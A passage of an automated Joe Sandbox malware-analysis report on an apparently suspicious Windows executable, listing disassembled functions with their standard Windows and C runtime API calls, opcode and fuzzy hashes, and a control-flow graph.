                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
                                                        • Instruction ID: d93c7bd9e5d99b4063e66a736cb3231a4a9e826bffd015feb1e4f8ddc2b26c54
                                                        • Opcode Fuzzy Hash: 9ca903b9cf5f984a890856c9b526cbfbbe81c083043c7d3df747fa7ce8575f70
                                                        • Instruction Fuzzy Hash: 50C1F92A98CB9AA1F660BB54D4072BEF750EFC0B80FD501B9D94E07391CE7DE845A720

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 902 7ff73ae2d520-7ff73ae2d545 903 7ff73ae2d54b-7ff73ae2d54e 902->903 904 7ff73ae2d813 902->904 906 7ff73ae2d587-7ff73ae2d5b3 903->906 907 7ff73ae2d550-7ff73ae2d582 call 7ff73ae2add8 903->907 905 7ff73ae2d815-7ff73ae2d825 904->905 909 7ff73ae2d5be-7ff73ae2d5c4 906->909 910 7ff73ae2d5b5-7ff73ae2d5bc 906->910 907->905 912 7ff73ae2d5c6-7ff73ae2d5cf call 7ff73ae2c8e0 909->912 913 7ff73ae2d5d4-7ff73ae2d5e9 call 7ff73ae33f8c 909->913 910->907 910->909 912->913 917 7ff73ae2d5ef-7ff73ae2d5f8 913->917 918 7ff73ae2d703-7ff73ae2d70c 913->918 917->918 919 7ff73ae2d5fe-7ff73ae2d602 917->919 920 7ff73ae2d70e-7ff73ae2d714 918->920 921 7ff73ae2d760-7ff73ae2d785 WriteFile 918->921 924 7ff73ae2d613-7ff73ae2d61e 919->924 925 7ff73ae2d604-7ff73ae2d60c call 7ff73ae24900 919->925 922 7ff73ae2d74c-7ff73ae2d75e call 7ff73ae2cfd8 920->922 923 7ff73ae2d716-7ff73ae2d719 920->923 926 7ff73ae2d787-7ff73ae2d78d GetLastError 921->926 927 7ff73ae2d790 921->927 950 7ff73ae2d6f0-7ff73ae2d6f7 922->950 928 7ff73ae2d738-7ff73ae2d74a call 7ff73ae2d1f8 923->928 929 7ff73ae2d71b-7ff73ae2d71e 923->929 931 7ff73ae2d62f-7ff73ae2d644 GetConsoleMode 924->931 932 7ff73ae2d620-7ff73ae2d629 924->932 925->924 926->927 934 7ff73ae2d793 927->934 928->950 935 7ff73ae2d7a4-7ff73ae2d7ae 929->935 936 7ff73ae2d724-7ff73ae2d736 call 7ff73ae2d0dc 929->936 939 7ff73ae2d64a-7ff73ae2d650 931->939 940 7ff73ae2d6fc 931->940 932->918 932->931 942 7ff73ae2d798 934->942 944 7ff73ae2d80c-7ff73ae2d811 935->944 945 7ff73ae2d7b0-7ff73ae2d7b5 935->945 936->950 948 7ff73ae2d6d9-7ff73ae2d6eb call 7ff73ae2cb60 939->948 949 7ff73ae2d656-7ff73ae2d659 939->949 940->918 943 7ff73ae2d79d 942->943 943->935 944->905 951 7ff73ae2d7b7-7ff73ae2d7ba 945->951 952 7ff73ae2d7e3-7ff73ae2d7ed 945->952 948->950 955 7ff73ae2d65b-7ff73ae2d65e 949->955 956 7ff73ae2d664-7ff73ae2d672 949->956 950->942 957 7ff73ae2d7bc-7ff73ae2d7cb 951->957 958 7ff73ae2d7d3-7ff73ae2d7de call 7ff73ae25480 951->958 959 7ff73ae2d7ef-7ff73ae2d7f2 952->959 960 7ff73ae2d7f4-7ff73ae2d803 952->960 955->943 955->956 961 7ff73ae2d6d0-7ff73ae2d6d4 956->961 962 7ff73ae2d674 956->962 957->958 958->952 959->904 959->960 960->944 961->934 964 7ff73ae2d678-7ff73ae2d68f call 7ff73ae34058 962->964 968 7ff73ae2d6c7-7ff73ae2d6cd GetLastError 964->968 969 7ff73ae2d691-7ff73ae2d69d 964->969 968->961 970 7ff73ae2d6bc-7ff73ae2d6c3 969->970 971 7ff73ae2d69f-7ff73ae2d6b1 call 7ff73ae34058 969->971 970->961 973 7ff73ae2d6c5 970->973 971->968 975 7ff73ae2d6b3-7ff73ae2d6ba 971->975 973->964 975->970
                                                        APIs
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF73AE2D50B), ref: 00007FF73AE2D63C
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF73AE2D50B), ref: 00007FF73AE2D6C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                        • Instruction ID: 30dbd524b9e1e784870a5350b66fabcf92893a990f300c4d6d663e86ec4b302f
                                                        • Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                        • Instruction Fuzzy Hash: ED91086AE48659A5F750BFA594832BDA7A0FB40B88F9442BDDF0E53684CF3CD441D320

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _get_daylight$_isindst
                                                        • String ID:
                                                        • API String ID: 4170891091-0
                                                        • Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                        • Instruction ID: 203dee9c60ca073e19a772662ced8eac1d99b2157f16dd7bc125bad1c875572e
                                                        • Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                        • Instruction Fuzzy Hash: 47513876F442169AFB14FF38D9476BCA7A5AB00368F900279DD1E42AD5DF3CA412D710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 1452418845-0
                                                        • Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                        • Instruction ID: d4279da879b1cb1c0eb9a4e976ec7a1c6d151e86654742d28337abf8d9d6dc9d
                                                        • Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                        • Instruction Fuzzy Hash: 93314029ECC27765FA14B764D45B3B993A1AF81744FC400F5E54E872D7DE2DA804A231
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 1279662727-0
                                                        • Opcode ID: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
                                                        • Instruction ID: 4f5db0490ab22610bbc4f214c6f5d6c7f40c748c216bee50138bf9169dad1ed6
                                                        • Opcode Fuzzy Hash: 067efb2484132faf2230e026e28e03925482aae0486071d1b8d39b4e2754336b
                                                        • Instruction Fuzzy Hash: 4F41B326D5878593F710BB209A02369A360FF95764F508378EA6C03AD1DF7CA5E09720
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                        • Instruction ID: 0ea81b0b8c42995916bb1f95f67c27d781d53a942660894a50f5984ead52efc1
                                                        • Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                        • Instruction Fuzzy Hash: F0D09E18F8860A62FB543B715C9B4B992156F48B01F9424BCD94F073D3DD6EA44D6260
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                        • Instruction ID: 9fe64c1ea9bac4f158ca46ec30e15588a9c00d093470109ba026b8fb427c634e
                                                        • Opcode Fuzzy Hash: 2f7bb398de8c4fd3266a2cb5114fed605c2779b223882c17691b198031e80610
                                                        • Instruction Fuzzy Hash: 95514A29B4925966F674FE35940377AE281BF40BA5F848778DD6D037C6CE3CE800A620
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF73AE2AF99,?,?,00000000,00007FF73AE2B04E), ref: 00007FF73AE2B18A
                                                        • GetLastError.KERNEL32(?,?,?,00007FF73AE2AF99,?,?,00000000,00007FF73AE2B04E), ref: 00007FF73AE2B194
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseErrorFindLastNotification
                                                        • String ID:
                                                        • API String ID: 1687624791-0
                                                        • Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                        • Instruction ID: 6236045319e1e640f3ae83a452524a8b764684dbd221092059e243eb8a4484b6
                                                        • Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                        • Instruction Fuzzy Hash: 29216D29F5878A60FE507720945727DE2816F80BE0FC443BCDA5E073C5CE2CE445A320
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                        • Instruction ID: b9f617885152aa6a23ed515512f55b6f74963e0c09e8c6b9065e0902d687442c
                                                        • Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                        • Instruction Fuzzy Hash: F311EF6AA08A9591EA10BB35E80A069A361AB84FF4F940375EEBE077D9CF7CD0519740
                                                        APIs
                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE27F39), ref: 00007FF73AE280DF
                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE27F39), ref: 00007FF73AE280F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Time$System$FileLocalSpecific
                                                        • String ID:
                                                        • API String ID: 1707611234-0
                                                        • Opcode ID: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
                                                        • Instruction ID: df34b71d1b1a2412e20803089e27fe47129005f95d39ec6375e824444e67d333
                                                        • Opcode Fuzzy Hash: 6407c983105320eb51bd989624a62bc8d87a63a3f1faf402972498077c5d17e8
                                                        • Instruction Fuzzy Hash: C9018E2690C25592F760BB14E40327EF7A0FB85B61FA04279EAA9019D8DF3DD010EB20
                                                        APIs
                                                        • RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
                                                        • GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: BoundaryDeleteDescriptorErrorLast
                                                        • String ID:
                                                        • API String ID: 2050971199-0
                                                        • Opcode ID: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                        • Instruction ID: 9e096e98c74cb3c71455a34ce45afc770a7f55d656537c29049d596d1d0a2e70
                                                        • Opcode Fuzzy Hash: bfb090b2684f97747e4e2589e7b79ee9627266c2664004addae3296ee4c2c8e2
                                                        • Instruction Fuzzy Hash: 2CE0865CF89206A2FF147BB1544707592509F84B01FC044FCC91E47292DE2C68856630
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2018770650-0
                                                        • Opcode ID: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                        • Instruction ID: 6ebdb07c593c13708ec9e9de26b1b98f8fb02eb2ed118d2fb8d977447bb6d9bb
                                                        • Opcode Fuzzy Hash: 4ec91da2963a3bb04052aa88cca811f321d2e1bc87a8cb66c404f3cefda0a691
                                                        • Instruction Fuzzy Hash: CDD0122CFD9507F1F61437760C8B039D2902F45B31FD046B8C02F811E0DE6DA0552531
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: DirectoryErrorLastRemove
                                                        • String ID:
                                                        • API String ID: 377330604-0
                                                        • Opcode ID: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                        • Instruction ID: 01ba3dcc91df8cce8928e8c98a1e64aa5c847efa90a157c630eb4af74ff40820
                                                        • Opcode Fuzzy Hash: 77acb875fdee33a12be4fb2ce6bc4fe447f240992313a5771dda9a679e1972f9
                                                        • Instruction Fuzzy Hash: A5D0C918F99507A1F61437751897039A2A02F45B31FD046BCC42A801E0DE2CA8853531
                                                        APIs
                                                          • Part of subcall function 00007FF73AE18AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF73AE12ABB), ref: 00007FF73AE18B1A
                                                        • _findclose.LIBCMT ref: 00007FF73AE17F99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_findclose
                                                        • String ID:
                                                        • API String ID: 2772937645-0
                                                        • Opcode ID: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
                                                        • Instruction ID: 744c7b4c9ce51d411a50b9c33d12edc05c3a73ffdb3d8594521e3bfc12943a94
                                                        • Opcode Fuzzy Hash: 6a56ecc169b874fe1e233505f6f9a5acf1cae56fd8a9bc6900038e6ac80cd412
                                                        • Instruction Fuzzy Hash: 7C71C156E18BC581E611EB2CC5462FDB360F7A9B4CF94E365DB8C12592EF28E2C9D700
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                        • Instruction ID: 4f37494e656d39e286f68293b54c18e88830fef85e2a9d447241e7fe3acad383
                                                        • Opcode Fuzzy Hash: 491d756dfbf5d606f7e783a7bab36e7eaa3001c20d525fc7b9da7dd63869e3d6
                                                        • Instruction Fuzzy Hash: 3E412676988219A3FA34FB28E547279B3A0EF95741F940279D68E43680CF2EE402D771
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _fread_nolock
                                                        • String ID:
                                                        • API String ID: 840049012-0
                                                        • Opcode ID: c646a1fd7cc9b3761defa3e231b998e5652de75a30cba53cf63e693a73b2805e
                                                        • Instruction ID: 0192222b72914a9259e605ea8aab5729ace8920b57e93f85a1a3304279c8080d
                                                        • Opcode Fuzzy Hash: c646a1fd7cc9b3761defa3e231b998e5652de75a30cba53cf63e693a73b2805e
                                                        • Instruction Fuzzy Hash: 5121E729B482A666FA14BB12A4477FAE651BF45BD4FCC50B0EE0D07786CF3CE441D620
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
